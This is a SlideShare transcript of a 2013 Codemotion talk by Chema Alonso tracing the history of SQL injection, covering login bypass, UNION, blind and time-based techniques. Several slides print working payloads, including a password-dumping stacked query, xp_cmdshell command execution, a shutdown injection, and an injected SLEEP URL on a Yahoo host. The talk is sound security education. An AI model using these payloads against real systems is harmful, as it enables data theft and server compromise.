Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Codemotion 2013: Feliz 15 aniversario, SQL Injection

2,465 views

Published on

Charla de Chema Alonso sobre la historia y evolución de las técnicas de SQL Injection en el evento Codemotion ES del año 2013 que tuvo lugar en la Escuela Universitaria de Informática de la Universidad Politécnica de Madrid

Published in: Technology
  • Be the first to comment

Codemotion 2013: Feliz 15 aniversario, SQL Injection

  1. 1. Feliz 15 aniversario, SQL Injection
  2. 2. Los Amantes del Círculo Polar
  3. 3. 25 – Dec – 1998: El nacimiento http://www.phrack.org/issues.html?id=8&issue=54
  4. 4. „or „1‟=„1 admin „ or „1‟=„1 q=“Select uid from users where uid=„“+$user+”‟ and pass=“‟+pass+‟”;” q=“Select uid from users where uid=„admin‟ and pass=„‟ or „1‟=„1‟;”
  5. 5. 14 – Aug – 2007: IBM http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability
  6. 6. Inband -1‘ union select 1,1,1,1,username,1,’a’,1 from users --
  7. 7. 2001 - OutBand http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc
  8. 8. Yesterday - [Microsoft][ODBC SQL Server Driver] [SQL Server]Incorrect syntax near the keyword 'or'. q=“Select title from noticias where ud=“+$id+”;” Id=1 or 1=(select top 1 username from sysusers)
  9. 9. Jul – 2007: Microsoft Partner Programme
  10. 10. 2002 – Advanced SQL Injection Techniques https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf
  11. 11. Advanced Tricks Username: '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end-- Username: ' union select ret,1,1,1 from foo-- Microsoft OLE DB Provider for ODBC Drivers error '80040e07‟ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/r00tr0x! guest/guest chris/password fred/sesame' to a column of data type int. exec master..xp_cmdshell 'dir' Id= 1; shutdown --
  12. 12. 27 – Mar - 2007
  13. 13. Outter Bands DNS Queries FTP Sites SMB Files Remote DB Web Files Log Files
  14. 14. 2002 - Blind http://server/miphp.php?id=1 and 1=1 True http://server/miphp.php?id=1 and 1=0 False
  15. 15. 2010 – US Army
  16. 16. 2010 – US Army
  17. 17. 2002 – Time Based Blind SQL Injection http://www.northernfortress.net/more_advanced_sql_injection.pdf
  18. 18. (more) Advanced Tricks ping -n 10 127.0.0.1 if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'
  19. 19. 2004 – Time-Based in Other Databases SQL Server 1) ; if … wait for delay 2) ; exec xp_cmdshell (ping –n) Oracle 1) dms_lock.sleep() PL/SLQ Injection MySQL 1) and sleep() 5.0 or higher 2) Benchmarck functions Postgres: 1) pg:sleep()
  20. 20. Jun – 2007 : Solar Empire Exploit http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html
  21. 21. Apr – 2013: Yahoo! http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p= 2&scId=113; select SLEEP(5)-- http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html
  22. 22. 2007 – Time-Based SQL Injection using Heavy Queries https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
  23. 23. Time-Based Using Heavy Queries in MS Access True False
  24. 24. Deep Blind SQL Injection http://labs.portcullis.co.uk/application/deep-blind-sql-injection
  25. 25. Serialized SQL Injection
  26. 26. Airthmetic Blind SQL Injection
  27. 27. RFD
  28. 28. Connection String Parameter Pollution
  29. 29. Xpath Injection
  30. 30. LDAP Injection
  31. 31. OWASP TOP 10 - 2013
  32. 32. Forbiden
  33. 33. Fixing Code Injections isn t the worst job

×